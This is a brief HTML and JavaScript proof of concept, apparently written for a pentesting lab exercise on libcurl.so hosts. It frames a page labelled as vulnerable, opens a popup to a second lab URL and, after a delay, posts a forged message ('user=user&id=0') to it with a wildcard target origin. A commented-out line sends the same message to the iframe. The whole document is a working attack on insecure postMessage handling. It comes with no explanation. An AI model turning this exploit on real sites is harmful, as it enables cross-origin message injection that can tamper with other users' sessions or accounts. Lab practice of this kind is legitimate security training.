<iframe src='http://ptl-733c816f-e7939d03.libcurl.so/' id='vulnerableSite'></iframe>

<script>

url = "http://ptl-ac060887-cd5942ce.libcurl.so/";

let popup = window.open(url);
setTimeout(() => popup.postMessage('user=user&id=0', '*'), 2000)

// let site = document.getElementById("vulnerableSite").contentWindow;
// site.postMessage('user=user&id=0', '*')

</script>
